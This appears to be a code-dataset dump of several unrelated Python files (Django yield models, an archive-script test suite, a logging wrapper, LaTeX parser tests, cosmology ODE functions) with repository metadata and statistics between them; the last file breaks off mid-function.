| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
c9a994c1410bce6782eb0e7284ec2acbe3cf6240
| 841
|
py
|
Python
|
website/index/models.py
|
FrederichRiver/neutrino3
|
c16c6ea824999c012252d0e281473a6ab13fd38e
|
[
"BSD-3-Clause"
] | 1
|
2021-07-12T11:20:58.000Z
|
2021-07-12T11:20:58.000Z
|
website/index/models.py
|
FrederichRiver/neutrino3
|
c16c6ea824999c012252d0e281473a6ab13fd38e
|
[
"BSD-3-Clause"
] | null | null | null |
website/index/models.py
|
FrederichRiver/neutrino3
|
c16c6ea824999c012252d0e281473a6ab13fd38e
|
[
"BSD-3-Clause"
] | null | null | null |
from django.db import models
class china_treasury_yield(models.Model):
    """China treasury yield-curve points, one row per report date."""
    report_date = models.DateField(primary_key=True)
    two_year = models.FloatField(blank=True, null=True)      # 2Y tenor yield
    five_year = models.FloatField(blank=True, null=True)     # 5Y tenor yield
    ten_year = models.FloatField(blank=True, null=True)      # 10Y tenor yield
    three_decade = models.FloatField(blank=True, null=True)  # 30Y tenor yield

    class Meta:
        # table is created and maintained outside Django migrations
        managed = False
        db_table = 'china_treasury_yield'
class us_treasury_yield(models.Model):
    """US treasury yield-curve points, one row per report date."""
    report_date = models.DateField(primary_key=True)
    two_year = models.FloatField(blank=True, null=True)      # 2Y tenor yield
    five_year = models.FloatField(blank=True, null=True)     # 5Y tenor yield
    ten_year = models.FloatField(blank=True, null=True)      # 10Y tenor yield
    three_decade = models.FloatField(blank=True, null=True)  # 30Y tenor yield

    class Meta:
        # table is created and maintained outside Django migrations
        managed = False
        db_table = 'us_treasury_yield'
| 32.346154
| 59
| 0.722949
| 113
| 841
| 5.185841
| 0.265487
| 0.21843
| 0.286689
| 0.341297
| 0.87372
| 0.87372
| 0.87372
| 0.87372
| 0.87372
| 0.87372
| 0
| 0
| 0.175981
| 841
| 25
| 60
| 33.64
| 0.845599
| 0
| 0
| 0.736842
| 0
| 0
| 0.043995
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.052632
| 0
| 0.789474
| 0
| 0
| 0
| 0
| null | 1
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
|
0
| 11
|
c9cc546111e45c9d5a98fc8dfd3a784dde627b36
| 8,542
|
py
|
Python
|
archive_test.py
|
peterloron/archive
|
6ae75272285d05593f064c945c9c1e77d510e1a8
|
[
"MIT"
] | null | null | null |
archive_test.py
|
peterloron/archive
|
6ae75272285d05593f064c945c9c1e77d510e1a8
|
[
"MIT"
] | null | null | null |
archive_test.py
|
peterloron/archive
|
6ae75272285d05593f064c945c9c1e77d510e1a8
|
[
"MIT"
] | null | null | null |
#!/usr/bin/env python
# -*- coding: utf-8 -*-
import unittest
import os
import datetime
import calendar
import subprocess
import shutil
class TestArchive(unittest.TestCase):
ROOT = os.getcwd()
BACK95 = calendar.timegm((datetime.datetime.utcnow() - (datetime.timedelta(days=95))).timetuple())
BACK46 = calendar.timegm((datetime.datetime.utcnow() - (datetime.timedelta(days=46))).timetuple())
@classmethod
def setUpClass(cls):
    """Build the test directory tree with files back-dated 46/95 days.

    Fixes over the original: the redundant try/except around
    shutil.rmtree(..., ignore_errors=True) is gone, the bare `except:`
    (which also swallowed KeyboardInterrupt) around os.remove is
    narrowed to OSError, and the repeated create-then-backdate pattern
    is factored into a local helper.
    """
    # do a bit of pre-emptive cleanup (rmtree already ignores errors)
    shutil.rmtree(os.path.join(cls.ROOT, "testout"), ignore_errors=True)
    shutil.rmtree(os.path.join(cls.ROOT, "1Folder Space"), ignore_errors=True)
    try:
        os.remove(os.path.join(cls.ROOT, "archive.log"))
    except OSError:
        pass  # log file may not exist; anything else is best-effort too

    def touch(path, stamp):
        # create an empty file and back-date its atime/mtime
        with open(path, 'a'):
            pass
        os.utime(path, (stamp, stamp))

    # create tree of data to be processed
    os.mkdir(os.path.join(cls.ROOT, "testout"))
    os.mkdir(os.path.join(cls.ROOT, "1Folder Space"))
    os.mkdir(os.path.join(cls.ROOT, "1Folder Space", "2Folder"))
    os.mkdir(os.path.join(cls.ROOT, "1Folder Space", "3Folder With Space"))
    os.mkdir(os.path.join(cls.ROOT, "1Folder Space", "3Folder With Space", "4Folder"))
    os.mkdir(os.path.join(cls.ROOT, "1Folder Space", "3Folder With Space", "5Folder"))
    thepath = os.path.join(cls.ROOT, "1Folder Space")
    touch(os.path.join(thepath, "1A.txt"), cls.BACK95)
    touch(os.path.join(thepath, "1B.txt"), cls.BACK95)
    touch(os.path.join(thepath, "Iris–Waveguide Interface - MechanicAspects.pptx"), cls.BACK95)
    thepath = os.path.join(cls.ROOT, "1Folder Space", "2Folder")
    touch(os.path.join(thepath, "2A.txt"), cls.BACK46)
    touch(os.path.join(thepath, "2B.txt"), cls.BACK95)
    thepath = os.path.join(cls.ROOT, "1Folder Space", "3Folder With Space", "4Folder")
    touch(os.path.join(thepath, "4A.txt"), cls.BACK46)
    touch(os.path.join(thepath, "4B.txt"), cls.BACK95)
    thepath = os.path.join(cls.ROOT, "1Folder Space", "3Folder With Space", "5Folder")
    touch(os.path.join(thepath, "5A.txt"), cls.BACK95)
    touch(os.path.join(thepath, "5B.txt"), cls.BACK95)
    for i in range(100):
        touch(os.path.join(thepath, ("%dC.txt" % i)), cls.BACK95)
@classmethod
def tearDownClass(cls):
shutil.rmtree(os.path.join(cls.ROOT, "testout"), ignore_errors=True)
shutil.rmtree(os.path.join(cls.ROOT, "1Folder Space"), ignore_errors=True)
None
def testFirstPass(self):
    """First archive pass with a 90-day cutoff: files older than 90 days
    (the BACK95 ones) must move to the destination; 46-day-old files and
    their parent folders stay in the source."""
    # run a pass of archive
    subprocess.check_call(['/usr/bin/python', 'archive.py', '-a90', '-s./1Folder Space', '-d./testout/1Folder Space'])
    # check what we have in the source
    thepath = os.path.join(self.ROOT, "1Folder Space")
    self.assertTrue(os.path.exists(thepath))
    self.assertFalse(os.path.exists(os.path.join(thepath, "1A.txt")))
    self.assertFalse(os.path.exists(os.path.join(thepath, "1B.txt")))
    self.assertTrue(os.path.exists(os.path.join(thepath, "2Folder")))
    self.assertTrue(os.path.exists(os.path.join(thepath, "3Folder With Space")))
    self.assertFalse(os.path.exists(os.path.join(thepath, "Iris–Waveguide Interface - MechanicAspects.pptx")))
    thepath = os.path.join(self.ROOT, "1Folder Space", "2Folder")
    self.assertTrue(os.path.exists(os.path.join(thepath, "2A.txt")))
    self.assertFalse(os.path.exists(os.path.join(thepath, "2B.txt")))
    thepath = os.path.join(self.ROOT, "1Folder Space", "3Folder With Space")
    self.assertTrue(os.path.exists(os.path.join(thepath, "4Folder")))
    # 5Folder contained only old files, so the whole folder was archived
    self.assertFalse(os.path.exists(os.path.join(thepath, "5Folder")))
    thepath = os.path.join(self.ROOT, "1Folder Space", "3Folder With Space", "4Folder")
    self.assertTrue(os.path.exists(os.path.join(thepath, "4A.txt")))
    self.assertFalse(os.path.exists(os.path.join(thepath, "4B.txt")))
    for i in range(100):
        self.assertFalse(os.path.exists(os.path.join(thepath, ("%dC.txt" % i))))
    # check what we have in the destination
    thepath = os.path.join(self.ROOT, "testout", "1Folder Space")
    self.assertTrue(os.path.exists(thepath))
    self.assertTrue(os.path.exists(os.path.join(thepath, "1A.txt")))
    self.assertTrue(os.path.exists(os.path.join(thepath, "1B.txt")))
    self.assertTrue(os.path.exists(os.path.join(thepath, "2Folder")))
    self.assertTrue(os.path.exists(os.path.join(thepath, "3Folder With Space")))
    self.assertTrue(os.path.exists(os.path.join(thepath, "Iris–Waveguide Interface - MechanicAspects.pptx")))
    thepath = os.path.join(self.ROOT, "testout", "1Folder Space", "2Folder")
    self.assertFalse(os.path.exists(os.path.join(thepath, "2A.txt")))
    self.assertTrue(os.path.exists(os.path.join(thepath, "2B.txt")))
    thepath = os.path.join(self.ROOT, "testout", "1Folder Space", "3Folder With Space")
    self.assertTrue(os.path.exists(os.path.join(thepath, "4Folder")))
    self.assertTrue(os.path.exists(os.path.join(thepath, "5Folder")))
    thepath = os.path.join(self.ROOT, "testout", "1Folder Space", "3Folder With Space", "4Folder")
    self.assertFalse(os.path.exists(os.path.join(thepath, "4A.txt")))
    self.assertTrue(os.path.exists(os.path.join(thepath, "4B.txt")))
    thepath = os.path.join(self.ROOT, "testout", "1Folder Space", "3Folder With Space", "5Folder")
    self.assertTrue(os.path.exists(os.path.join(thepath, "5A.txt")))
    self.assertTrue(os.path.exists(os.path.join(thepath, "5B.txt")))
    for i in range(100):
        self.assertTrue(os.path.exists(os.path.join(thepath, ("%dC.txt" % i))))
def testSecondPass(self):
    """Second archive pass: the whole remaining source tree must move to testout."""
    # Run one pass of the archiver over the remaining source folder.
    subprocess.check_call(['/usr/bin/python', 'archive.py', '-a30',
                           '-s./1Folder Space', '-d./testout/1Folder Space'])
    # The source tree should be gone entirely after this pass.
    self.assertFalse(os.path.exists(os.path.join(self.ROOT, "1Folder Space")))
    # The destination should now hold every file and folder.
    dest = os.path.join(self.ROOT, "testout", "1Folder Space")
    self.assertTrue(os.path.exists(dest))
    for name in ("1A.txt", "1B.txt", "2Folder", "3Folder With Space",
                 "Iris–Waveguide Interface - MechanicAspects.pptx"):
        self.assertTrue(os.path.exists(os.path.join(dest, name)))
    # Nested folders and their files, checked folder by folder.
    for subfolder, names in (
            (("2Folder",), ("2A.txt", "2B.txt")),
            (("3Folder With Space",), ("4Folder", "5Folder")),
            (("3Folder With Space", "4Folder"), ("4A.txt", "4B.txt")),
            (("3Folder With Space", "5Folder"), ("5A.txt", "5B.txt")),
    ):
        folder = os.path.join(dest, *subfolder)
        for name in names:
            self.assertTrue(os.path.exists(os.path.join(folder, name)))
if __name__ == '__main__':
    # Run the archive integration test suite when executed directly.
    unittest.main()
| 50.247059
| 122
| 0.637556
| 1,180
| 8,542
| 4.607627
| 0.098305
| 0.145669
| 0.163693
| 0.184477
| 0.924591
| 0.9119
| 0.883208
| 0.86831
| 0.829134
| 0.756483
| 0
| 0.024195
| 0.182276
| 8,542
| 169
| 123
| 50.544379
| 0.753472
| 0.034652
| 0
| 0.5
| 0
| 0
| 0.186984
| 0
| 0
| 0
| 0
| 0
| 0.34127
| 1
| 0.031746
| false
| 0.015873
| 0.047619
| 0
| 0.111111
| 0
| 0
| 0
| 0
| null | 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
a00847664142966315966adad00658d0073eddad
| 2,577
|
py
|
Python
|
src/conformity_migration_tool/logger.py
|
ronald-bautista/conformity-migration-tool
|
03b8a7a9fb99bb3f975d85db0a2c1ae1205cad2f
|
[
"MIT"
] | 1
|
2022-03-24T19:54:13.000Z
|
2022-03-24T19:54:13.000Z
|
src/conformity_migration_tool/logger.py
|
ronald-bautista/conformity-migration-tool
|
03b8a7a9fb99bb3f975d85db0a2c1ae1205cad2f
|
[
"MIT"
] | null | null | null |
src/conformity_migration_tool/logger.py
|
ronald-bautista/conformity-migration-tool
|
03b8a7a9fb99bb3f975d85db0a2c1ae1205cad2f
|
[
"MIT"
] | 4
|
2022-01-27T21:16:18.000Z
|
2022-03-24T15:24:12.000Z
|
import logging
class Logger:
    """Minimal logging interface.

    Every method takes a message, printf-style args, an extra keyword-only
    ``file_only`` flag, and arbitrary keyword args.  The base class is a
    no-op for every level; concrete subclasses supply the behaviour.
    """

    def info(self, msg: object, *args, file_only=False, **kwargs) -> None:
        """Log *msg* at INFO level (no-op in the base class)."""

    def warn(self, msg: object, *args, file_only=False, **kwargs) -> None:
        """Log *msg* at WARNING level (no-op in the base class)."""

    def debug(self, msg: object, *args, file_only=False, **kwargs) -> None:
        """Log *msg* at DEBUG level (no-op in the base class)."""

    def error(self, msg: object, *args, file_only=False, **kwargs) -> None:
        """Log *msg* at ERROR level (no-op in the base class)."""

    def exception(self, msg: object, *args, file_only=False, **kwargs) -> None:
        """Log an exception message (no-op in the base class)."""
class AppLogger(Logger):
    """Logger backed by a concrete ``logging.Logger``.

    Strips the print()-only keyword arguments (these call sites were converted
    from print statements) and forwards the ``file_only`` flag to handlers via
    the log record's ``extra`` dict.
    """

    def __init__(self, logger: logging.Logger) -> None:
        self.logger = logger

    def _prepare_for_log(self, kwargs: dict, file_only=False):
        """Normalise *kwargs* in place before delegating to ``logging``."""
        # Parameters print() accepts but logging.Logger methods do not.
        for print_only in ("end", "flush"):
            kwargs.pop(print_only, None)
        extra: dict = kwargs.setdefault("extra", dict())
        extra["file_only"] = file_only

    def info(self, msg: object, *args, file_only=False, **kwargs) -> None:
        self._prepare_for_log(kwargs, file_only=file_only)
        return self.logger.info(msg, *args, **kwargs)

    def warn(self, msg: object, *args, file_only=False, **kwargs) -> None:
        # Delegates to warning(); Logger.warn is the deprecated spelling.
        self._prepare_for_log(kwargs, file_only=file_only)
        return self.logger.warning(msg, *args, **kwargs)

    def debug(self, msg: object, *args, file_only=False, **kwargs) -> None:
        self._prepare_for_log(kwargs, file_only=file_only)
        return self.logger.debug(msg, *args, **kwargs)

    def error(self, msg: object, *args, file_only=False, **kwargs) -> None:
        self._prepare_for_log(kwargs, file_only=file_only)
        return self.logger.error(msg, *args, **kwargs)

    def exception(self, msg: object, *args, file_only=False, **kwargs) -> None:
        self._prepare_for_log(kwargs, file_only=file_only)
        return self.logger.exception(msg, *args, **kwargs)
class NoStrackTraceExceptionFormatter(logging.Formatter):
    """Formatter that renders an exception as its message only, no traceback."""

    def formatException(self, exc_info) -> str:
        # exc_info is the (type, value, traceback) triple; keep just the value.
        return str(exc_info[1])

    def format(self, record: logging.LogRecord):
        # Invalidate exc_text cached by another handler's Formatter so that
        # our formatException() output is recomputed instead of reused.
        record.exc_text = ""
        formatted = super().format(record=record)
        return formatted
class WithStrackTraceExceptionFormatter(logging.Formatter):
    """Formatter that keeps the full stack trace in exception output."""

    def formatException(self, exc_info) -> str:
        # Standard traceback rendering, delegated to the base Formatter.
        return super().formatException(exc_info)

    def format(self, record: logging.LogRecord):
        # Invalidate exc_text cached by another handler's Formatter so that
        # the traceback is re-rendered by this formatter.
        record.exc_text = ""
        formatted = super().format(record=record)
        return formatted
| 35.791667
| 94
| 0.658906
| 325
| 2,577
| 5.055385
| 0.172308
| 0.11199
| 0.087036
| 0.103469
| 0.709069
| 0.709069
| 0.709069
| 0.709069
| 0.709069
| 0.643335
| 0
| 0.000489
| 0.207218
| 2,577
| 71
| 95
| 36.295775
| 0.80372
| 0.085759
| 0
| 0.595745
| 0
| 0
| 0.009354
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.340426
| false
| 0
| 0.021277
| 0.042553
| 0.638298
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 1
| 0
|
0
| 7
|
a009fec97ec6f01cb9a7f3e879281e82ad662e92
| 155
|
py
|
Python
|
src/spaceone/monitoring/service/__init__.py
|
jihyungSong/plugin-aws-health
|
a3e43dff6c7c5c2e911bc5141807e124ee8be2fe
|
[
"Apache-2.0"
] | 2
|
2020-06-22T01:48:21.000Z
|
2020-08-07T05:22:55.000Z
|
src/spaceone/monitoring/service/__init__.py
|
jihyungSong/plugin-aws-health
|
a3e43dff6c7c5c2e911bc5141807e124ee8be2fe
|
[
"Apache-2.0"
] | null | null | null |
src/spaceone/monitoring/service/__init__.py
|
jihyungSong/plugin-aws-health
|
a3e43dff6c7c5c2e911bc5141807e124ee8be2fe
|
[
"Apache-2.0"
] | 3
|
2020-09-09T03:34:25.000Z
|
2021-03-25T05:19:40.000Z
|
from spaceone.monitoring.service.monitoring_service import MonitoringService
from spaceone.monitoring.service.data_source_service import DataSourceService
| 51.666667
| 77
| 0.909677
| 17
| 155
| 8.117647
| 0.529412
| 0.369565
| 0.318841
| 0.42029
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.051613
| 155
| 2
| 78
| 77.5
| 0.938776
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 8
|
4ecc88b6ae151b364560dd4dce99e61c7966107f
| 2,337
|
py
|
Python
|
tests/atom_expr_test.py
|
purdue-tlt/latex2sympy
|
f3e29fbf1e6979c6416844073863bbaa976927fc
|
[
"MIT"
] | 11
|
2020-05-19T19:56:50.000Z
|
2022-03-31T08:31:56.000Z
|
tests/atom_expr_test.py
|
purdue-tlt/latex2sympy
|
f3e29fbf1e6979c6416844073863bbaa976927fc
|
[
"MIT"
] | 14
|
2019-06-06T14:47:15.000Z
|
2022-03-28T14:40:41.000Z
|
tests/atom_expr_test.py
|
purdue-tlt/latex2sympy
|
f3e29fbf1e6979c6416844073863bbaa976927fc
|
[
"MIT"
] | 4
|
2020-07-11T21:39:16.000Z
|
2021-05-10T11:10:12.000Z
|
from .context import assert_equal
import pytest
from sympy import Symbol, Integer, Pow
# Each symbol row is (label, latex_text, expected_symbol_text).
symbols = [
    ('letter', 'x', 'x'),
    ('greek letter', '\\lambda', 'lambda'),
    ('greek letter w/ space', '\\alpha ', 'alpha'),
    ('accented letter', '\\overline{x}', 'xbar'),
]

# Subscript variants, both bare and braced.
subscripts = [
    '2',
    '{23}',
    'i',
    '{ij}',
    '{i,j}',
    '{good}',
    '{x^{2}}',
]

# Cross product: every symbol paired with every subscript, as 4-tuples
# (label, text, symbol_text, subscript).
examples = [symbol + (subscript,) for symbol in symbols for subscript in subscripts]
@pytest.mark.parametrize('label, text, symbol_text, subscript', examples)
def test_with_supexpr(label, text, symbol_text, subscript):
    # text^2 must parse to Symbol(symbol_text)**2.
    expected = Pow(Symbol(symbol_text, real=True, positive=True), Integer(2))
    assert_equal(text + '^2', expected)
@pytest.mark.parametrize('label, text, symbol_text, subscript', examples)
def test_with_subexpr(label, text, symbol_text, subscript):
    # text_subscript must parse to one subscripted symbol.
    expected = Symbol(symbol_text + '_' + subscript, real=True, positive=True)
    assert_equal(text + '_' + subscript, expected)
@pytest.mark.parametrize('label, text, symbol_text, subscript', examples)
def test_with_subexpr_before_supexpr(label, text, symbol_text, subscript):
    # text_subscript^2 must parse to (subscripted symbol)**2.
    latex = text + '_' + subscript + '^2'
    expected = Pow(Symbol(symbol_text + '_' + subscript, real=True, positive=True), Integer(2))
    assert_equal(latex, expected)
@pytest.mark.parametrize('label, text, symbol_text, subscript', examples)
def test_with_subexpr_before_supexpr_with_braces(label, text, symbol_text, subscript):
    # Brace the subscript when it is not already braced; result is unchanged.
    braced = subscript if '{' in subscript else '{' + subscript + '}'
    expected = Pow(Symbol(symbol_text + '_' + subscript, real=True, positive=True), Integer(2))
    assert_equal(text + '_' + braced + '^{2}', expected)
@pytest.mark.parametrize('label, text, symbol_text, subscript', examples)
def test_with_supexpr_before_subexpr(label, text, symbol_text, subscript):
    # Superscript written before the subscript parses the same way.
    latex = text + '^2_' + subscript
    expected = Pow(Symbol(symbol_text + '_' + subscript, real=True, positive=True), Integer(2))
    assert_equal(latex, expected)
@pytest.mark.parametrize('label, text, symbol_text, subscript', examples)
def test_with_supexpr_before_subexpr_with_braces(label, text, symbol_text, subscript):
    # Braced superscript first, braced subscript second; result is unchanged.
    braced = subscript if '{' in subscript else '{' + subscript + '}'
    expected = Pow(Symbol(symbol_text + '_' + subscript, real=True, positive=True), Integer(2))
    assert_equal(text + '^{2}_' + braced, expected)
| 39.610169
| 139
| 0.693196
| 289
| 2,337
| 5.384083
| 0.179931
| 0.122108
| 0.207584
| 0.15874
| 0.802057
| 0.789203
| 0.789203
| 0.789203
| 0.760283
| 0.642674
| 0
| 0.006965
| 0.139923
| 2,337
| 58
| 140
| 40.293103
| 0.767164
| 0.01027
| 0
| 0.190476
| 0
| 0
| 0.159238
| 0
| 0
| 0
| 0
| 0
| 0.166667
| 1
| 0.142857
| false
| 0
| 0.071429
| 0
| 0.214286
| 0
| 0
| 0
| 0
| null | 0
| 1
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
093d867bc78bab69dd379b27027066a010b3b665
| 200
|
py
|
Python
|
tests/utils.py
|
frainfreeze/sqlalchemy-filters-plus
|
1886cf39110504aee54330857b8317a31cd9606e
|
[
"BSD-3-Clause"
] | 25
|
2021-03-28T18:28:01.000Z
|
2022-03-19T00:35:48.000Z
|
tests/utils.py
|
frainfreeze/sqlalchemy-filters-plus
|
1886cf39110504aee54330857b8317a31cd9606e
|
[
"BSD-3-Clause"
] | 3
|
2021-09-20T16:37:39.000Z
|
2022-03-21T00:47:23.000Z
|
tests/utils.py
|
frainfreeze/sqlalchemy-filters-plus
|
1886cf39110504aee54330857b8317a31cd9606e
|
[
"BSD-3-Clause"
] | 4
|
2021-08-28T02:54:16.000Z
|
2022-02-25T11:57:35.000Z
|
def compares_expressions(exp1, exp2) -> bool:
    """Return True when the two expressions compile to identical SQL text."""
    def _render(expression):
        # literal_binds inlines bound parameters so values are compared too.
        compiled = expression.compile(compile_kwargs={"literal_binds": True})
        return str(compiled)
    return _render(exp1) == _render(exp2)
| 33.333333
| 66
| 0.705
| 27
| 200
| 5
| 0.518519
| 0.222222
| 0.192593
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.023669
| 0.155
| 200
| 5
| 67
| 40
| 0.775148
| 0
| 0
| 0
| 0
| 0
| 0.065
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.5
| false
| 0
| 0
| 0.25
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 1
| 1
| 0
|
0
| 7
|
1185a813c87a602d02f8115a953688188f6b39a8
| 17,983
|
py
|
Python
|
zprev versions/firstderivs1.py
|
lefthandedroo/Cosmodels
|
c355d18021467cf92546cf2fc9cb1d1abe59b8d8
|
[
"MIT"
] | null | null | null |
zprev versions/firstderivs1.py
|
lefthandedroo/Cosmodels
|
c355d18021467cf92546cf2fc9cb1d1abe59b8d8
|
[
"MIT"
] | null | null | null |
zprev versions/firstderivs1.py
|
lefthandedroo/Cosmodels
|
c355d18021467cf92546cf2fc9cb1d1abe59b8d8
|
[
"MIT"
] | null | null | null |
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
Created on Thu Feb 15 13:23:25 2018
@author: BallBlueMeercat
"""
import numpy as np
# Equation-of-state parameters for the known cosmological fluids:
w_r = 1/3 # radiation
w_m = 0.0 # pressureless matter
w_de = -1.0 # cosmological constant (dark energy)
def expgamma(v, t, gamma, H0):
    """ODE right-hand side with an exponential interaction term, d/dz form.

    v     -- state at the current z: (t, a, ombar_m, ombar_de, z, dl)
    t     -- redshift list for the integrator (shadowed by v's own t entry)
    gamma -- interaction strength
    H0    -- Hubble constant at z = 0

    Returns [dt/dz, da/dz, d(ombar_m)/dz, d(ombar_de)/dz, dz/dz, d(dl)/dz].
    """
    t, a, ombar_m, ombar_de, z, dl = v

    # Hubble parameter at this z from the total (dimensionless) density.
    Hz = H0 * (ombar_m + ombar_de)**(1/2)

    if np.isnan(Hz):
        # Diagnostic dump when the densities push H(z) out of the real domain.
        print('expgamma')
        print('z = %s, Hz = %s, gamma = %s, ombar_m = %s, ombar_de = %s'
              %(z, Hz, gamma, ombar_m, ombar_de))

    # Matter <-> dark-energy exchange rate for this interaction model.
    irate = (1-np.exp(gamma))*(1-ombar_de/(ombar_de+ombar_m)) /(1+z)/Hz

    dtdz = -1/((1+z) * Hz)             # dt/dz
    dadz = -(1+z)**(-2)                # d(scale factor)/dz
    dmdz = 3*ombar_m /(1+z) - irate    # d(ombar_m)/dz
    dldz = 1/Hz                        # d(luminosity distance)/dz

    return [dtdz, dadz, dmdz, irate, 1, dldz]
def txgamma(v, t, gamma, H0):
    """ODE right-hand side with a gamma/(-t) interaction term, d/dz form.

    v     -- state at the current z: (t, a, ombar_m, ombar_de, z, dl)
    t     -- redshift list for the integrator (shadowed by v's own t entry)
    gamma -- interaction strength
    H0    -- Hubble constant at z = 0

    Returns [dt/dz, da/dz, d(ombar_m)/dz, d(ombar_de)/dz, dz/dz, d(dl)/dz].
    """
    t, a, ombar_m, ombar_de, z, dl = v

    # Hubble parameter at this z from the total (dimensionless) density.
    Hz = H0 * (ombar_m + ombar_de)**(1/2)

    if np.isnan(Hz):
        # Diagnostic dump when the densities push H(z) out of the real domain.
        print('txgamma')
        print('z = %s, Hz = %s, gamma = %s, ombar_m = %s, ombar_de = %s'
              %(z, Hz, gamma, ombar_m, ombar_de))

    # Exchange rate; the 0.0001 offset avoids dividing by zero at t = 0.
    irate = (gamma/(-t+0.0001))*(1-ombar_de/(ombar_de+ombar_m)) /(1+z)/Hz

    dtdz = -1/((1+z) * Hz)             # dt/dz
    dadz = -(1+z)**(-2)                # d(scale factor)/dz
    dmdz = 3*ombar_m /(1+z) - irate    # d(ombar_m)/dz
    dldz = 1/Hz                        # d(luminosity distance)/dz

    return [dtdz, dadz, dmdz, irate, 1, dldz]
def zxgamma(v, t, gamma, H0):
    """ODE right-hand side with a z*gamma interaction term, d/dz form.

    v     -- state at the current z: (t, a, ombar_m, ombar_de, z, dl)
    t     -- redshift list for the integrator (shadowed by v's own t entry)
    gamma -- interaction strength
    H0    -- Hubble constant at z = 0

    Returns [dt/dz, da/dz, d(ombar_m)/dz, d(ombar_de)/dz, dz/dz, d(dl)/dz].
    """
    t, a, ombar_m, ombar_de, z, dl = v

    # Hubble parameter at this z from the total (dimensionless) density.
    Hz = H0 * (ombar_m + ombar_de)**(1/2)

    if np.isnan(Hz):
        # Diagnostic dump when the densities push H(z) out of the real domain.
        print('zxgamma')
        print('z = %s, Hz = %s, gamma = %s, ombar_m = %s, ombar_de = %s'
              %(z, Hz, gamma, ombar_m, ombar_de))

    # Matter <-> dark-energy exchange rate, scaled linearly with z.
    irate = z*gamma*(1-ombar_de/(ombar_de+ombar_m)) /(1+z)/Hz

    dtdz = -1/((1+z) * Hz)             # dt/dz
    dadz = -(1+z)**(-2)                # d(scale factor)/dz
    dmdz = 3*ombar_m /(1+z) - irate    # d(ombar_m)/dz
    dldz = 1/Hz                        # d(luminosity distance)/dz

    return [dtdz, dadz, dmdz, irate, 1, dldz]
def gamma_over_z(v, t, gamma, H0):
    """ODE right-hand side with a gamma/z interaction term, d/dz form.

    v     -- state at the current z: (t, a, ombar_m, ombar_de, z, dl)
    t     -- redshift list for the integrator (shadowed by v's own t entry)
    gamma -- interaction strength
    H0    -- Hubble constant at z = 0

    Returns [dt/dz, da/dz, d(ombar_m)/dz, d(ombar_de)/dz, dz/dz, d(dl)/dz].
    """
    t, a, ombar_m, ombar_de, z, dl = v

    # Hubble parameter at this z from the total (dimensionless) density.
    Hz = H0 * (ombar_m + ombar_de)**(1/2)

    if np.isnan(Hz):
        # Diagnostic dump when the densities push H(z) out of the real domain.
        print('gamma_over_z')
        print('z = %s, Hz = %s, gamma = %s, ombar_m = %s, ombar_de = %s'
              %(z, Hz, gamma, ombar_m, ombar_de))

    # Exchange rate; the 0.01 offset avoids dividing by zero at z = 0.
    irate = gamma/(z + 0.01)*(1-ombar_de/(ombar_de+ombar_m)) /(1+z)/Hz

    dtdz = -1/((1+z) * Hz)             # dt/dz
    dadz = -(1+z)**(-2)                # d(scale factor)/dz
    dmdz = 3*ombar_m /(1+z) - irate    # d(ombar_m)/dz
    dldz = 1/Hz                        # d(luminosity distance)/dz

    return [dtdz, dadz, dmdz, irate, 1, dldz]
def zxxgamma(v, t, gamma, H0):
    """ODE right-hand side with a z**gamma interaction term, d/dz form.

    v     -- state at the current z: (t, a, ombar_m, ombar_de, z, dl)
    t     -- redshift list for the integrator (shadowed by v's own t entry)
    gamma -- interaction strength
    H0    -- Hubble constant at z = 0

    Returns [dt/dz, da/dz, d(ombar_m)/dz, d(ombar_de)/dz, dz/dz, d(dl)/dz].
    """
    t, a, ombar_m, ombar_de, z, dl = v

    # Hubble parameter at this z from the total (dimensionless) density.
    Hz = H0 * (ombar_m + ombar_de)**(1/2)

    if np.isnan(Hz):
        # Diagnostic dump when the densities push H(z) out of the real domain.
        print('zxxgamma')
        print('z = %s, Hz = %s, gamma = %s, ombar_m = %s, ombar_de = %s'
              %(z, Hz, gamma, ombar_m, ombar_de))

    # Matter <-> dark-energy exchange rate, scaled as z**gamma.
    irate = (z**gamma)*(1-ombar_de/(ombar_de+ombar_m)) /(1+z)/Hz

